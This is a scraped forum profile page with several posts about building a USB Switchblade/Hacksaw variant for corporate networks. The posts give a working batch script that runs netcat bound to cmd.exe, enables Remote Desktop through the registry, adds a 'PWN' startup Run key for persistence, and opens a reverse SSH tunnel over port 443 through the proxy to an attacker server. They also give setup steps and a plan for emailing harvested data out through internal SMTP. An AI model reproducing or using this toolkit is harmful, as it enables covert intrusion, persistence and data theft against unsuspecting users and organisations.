-
Posts
5 -
Joined
-
Last visited
Posts posted by greypwny
-
-
Well finally i have had some time to put this together, below is a zip file of my U3custom folder.
http://www.box.net/shared/6bm6ruod1d
Now before this will work you need to configure a couple of things
First things first you need to create a ssh account etc on your "server" the following instructions are HOW TO for OpenSSH public key authentication
1) Create a RSA ssh key pair with an empty pass phrase
$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/someuser/.ssh/id_rsa): /home/someuser/.ssh/secuser_id_rsa
Enter passphrase (empty for no passphrase): [enter]
Enter same passphrase again: [enter]
Your identification has been saved in /home/someuser/.ssh/secuser_id_rsa.
Your public key has been saved in /home/someuser/.ssh/secuser_id_rsa.pub.
The key fingerprint is:
8d:ef:b0:0f:9e:b5:cb:bd:4d:e3:12:da:a6:dc:3a:84 user@host
$ cat /home/someuser/.ssh/secuser_id_rsa
Note: This is the ssh private key you just created. This is the key that gets saved on the USB drive.
$ cat /home/someuser/.ssh/secuser_id_rsa.pub
Note: This is the ssh public key you just created. Copy this for step 3 later.
2) Create a user on the system that you want the victim PC to login to.
$sudo useradd [uSERNAME] -c "Hacksaw test user" -d /home/[uSERNAME] -m
Note: For the newbies replace the [uSERNAME] with an actual username like HACKSAW or something like that
3) Setup ssh public key auth for this user
$ sudo su - [uSERNAME] -c 'mkdir ~/.ssh'
$ sudo su - [uSERNAME] -c 'chmod 755 ~/.ssh'
$ sudo su - [uSERNAME] -c 'cat > ~/.ssh/authorized_keys2'
[paste your public key from step 1]
[CTRL-D]
$ sudo su - [uSERNAME] -c 'chmod 600 ~/.ssh/authorized_keys2'
4) Test it out
$ ssh -l secuser -i /home/someuser/.ssh/secuser_id_rsa localhost
8<--snip usual login guff
$ id
uid=1001(secuser) gid=1002(secuser) groups=1002(secuser)
Note: /home/someuser/.ssh/secuser_id_rsa is the path and filename for the private key you created in step 1.
Note: If this fails for any reason, re-run the ssh command with “-vvv” for very very verbose output and look for the reason it fails.
5) Create a limited shell for this user to stop people using it for bad things, scp, etc.
Create a shell file with the following in it using which ever text editor you like, call it hacksawshell.sh and save it to /usr/local/bin/
#!/bin/bash
while [ 1 ]; do
echo Greetings
sleep 60
done
[CTRL-D]
$ sudo chmod 755 /usr/local/bin/hacksawshell.sh
$ sudo chsh -s /usr/local/bin/hacksawshell.sh [uSERNAME]
Note: make sure you test this, and make sure the [username] cannot get a normal shell, or use scp/sftp/etc.
$ssh -l [username] -i /home/[usernaccount]/.ssh/[username]_id_rsa localhost
Last login: Thu Oct 26 16:46:33 2007 from localhost
Greetings
So now you have setup the server and hopefully by the time you have done this the file mentioned above has downloaded.
6) Unzip the file on your machine and move the contents to your u3custome folder
if you haven't already read the above, this is all based on the GONZOR switch blade go to http://www.users.on.net/~simmo_89/switchblade/Index.html to download his original files and replace his u3custom folder with mine
7) Now it is time to edit a couple of files
Edit the the go.bat found in the u3customsystemsrcssh folder
Now in the last line put in the details of your ssh server
Copy those details you have added and put it in go2.bat and go3.bat found in the aforementioned folder
edit u3customsystemsrcsshssh_config file and the proxy details to be used
8 ) Adding your ssh private key
In the u3customsystemsrcssh there is a file called ssh.key please copy your private key created in step one into this folder
9) Sendmail options
I know there is gui that was created for this but i found it didn't do some of the things I wanted to do so yet again edit
u3customsystemsend.bat
add your mailserver (smtp) and of course the port number this in the line that begins with "for"
And please set the variables for emailfrom, emailto, password etc
10) and we are almost done
I have also updated the antidote file that will hopefully kill and remove things, yet again this is built on GONZOR's.
http://www.box.net/shared/46rrt9plir
11) Create the key
Run the isocreate.cmd as per the GONZOR instructions and then of course the Universal_customizer.exe file
Once this is done open the executable SBCONFIG-Vxxxx.exe and make sure all items are checked.
Save your config and your done.
I hope i haven't missed any steps in putting this together and if I have then please let me know.
Things to note
This does not grab the settings from the user regarding the proxy details this is something (as per step 7) I'm still working on and I' hope you can help me out. As mentioned not sure what is the best way to go whether i need to run a proxycfg -u command and grab those details and add it to the ssh_config file.
Thoughts and ideas welcome.
Remember it is rude not to share :)
-
We created a limited shell for this user to stop people using it for bad things, scp, etc.
#!/bin/bash
while [ 1 ]; do
echo Greetings
sleep 60
done
This seemed to be enough to keep the session alive.
Is it your proxy that is terminating the session?
I'm having some trouble in finding a site to upload the zip of my u3custom to. Does anyone have some hosting to allow me to do this or a recommendation of where to host said file?
-
I will post it shortly as I need to make sure there is nothing in there that ties it back to me personally :?
Should be up in the next day or so.
-
With all the talk that has been going on of late on hxxp: wiki. hak5. org/wiki//USB_Switchblade. I decided to put one together based on the GonZor SwitchBlade but with a couple of modifications.
This device was to be used/tested in a corporate environment which used authenticated web proxies and there were some unathenticated proxies and with no access to external smtp servers. So using things like VNC and net cat would be useless unless the attacker were sitting on the same network. The other problem was the user had personal firewalls enabled.
So we needed to devise a plan where all bindings for networks were made to localhost. Communications could only be established if:
* we could find and connect to an unauthenticated proxy
* outgoing port would need to be 443
* the traffic would need to be encrypted
* locate an internal smtp server for the hacksaw component
Solutions
* A wget on the proxy. pac file and search for the word Unauthenticated and an regex that looked like an (WORK IN PROGRESS)
* netcat running in listen mode
* an SSH server listening on port 443 with a username that can only connect to a chrooted jail or at worst to a restricted shell
* the ssh certificate already on the USB key
* a piece of software called connect. exe to facilitate the connect method
* openssh on the usb key
This worked to punch a undetected hole out to real world and with an effective reverse ssh session we now have access to netcat for shell commands, VNC and RDESKTOP to take control of the machine and attempting to map smb ports to higher ports for network connectivity.
Below is an extract from my go. bat file that facilitates this
REM - go. bat ssh file
@echo on
cd SystemSRC >NUL
REM . nircmd. exe execmd . nc -L -p 52323 -d -e cmd. exe REM netcat running in listen mode on port 52323 running from USB key not good for the "thumb suck method"
md "%systemroot%ssh" REM create directory for SSH
xcopy ". ssh*. *" "%systemroot%"ssh /c /e /y REM copy ssh components (cut down from openssh)
cd
md c:bin REM this needs to be made dynamic but hey I'm lazy
xcopy "bin*. *" "c:bin" /c /e /y REM copy bin components of SSH (probably a better way to do this but hey it works)
c:
cd "%systemroot%ssh"
nircmd. exe execmd nc -L -p 52323 -d -e cmd. exe REM Netcat running in listen mode from the computer rather then the usb key
REG ADD "HKEY_LOCAL_MACHINEsystemcurrentcontrolsetcontrolterminal server /f /v fDenyTSConnections /t REG_DWORD /d 0" / f
REM Enable remote desktop
REG ADD "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /f /v PWN /t REG_SZ /d "%systemroot%sshssh. lnk" /f
REM enable this process to begin on startup
ssh -F ssh_config hacksaw@domain. com:443 -i ssh. key -R 52323:localhost:52323 -R 5900:localhost:5900 -R 5800:localhost:5800 -R 52324:localhost:445 -R 3389:localhost:3389 -vvv -C
REM SSH session to the server
Extract from the config file
# This is ssh client systemwide configuration file. This file provides
# defaults for users, and the values can be changed in per-user configuration
# files or on the command line.
StrictHostKeyChecking no
ProxyCommand "c:windowssshconnect. exe" -H IPADDRESS:PORT %h %p #using the connect method to get out to the web
This process doesn't require the user to be a local administrator and will run every time the user starts the system. Even if they are on a non split tunnel VPN connection. There are still a couple of steps to work out how to do.
I still haven't had time to write the script that gets the IP of the unauthenticated proxy, or how to bind with outlook or other email client to send the results of the hacksaw to an email address.
Thoughts on the proxy are
run proxycfg -u from command prompt if there is a pac file found do a wget and then search for the words unauthenticated then grep on the IP address and set as variable.
Please offer comments or post questions to help with this approach.
USB Hacksaw/SwitchBlade for the corporate network
in USB Hacks
Posted
I think there are enough guides out there that encapsulate what you are trying to do.
Why don't you errr, ummm use your noodle and work it out, we all had to!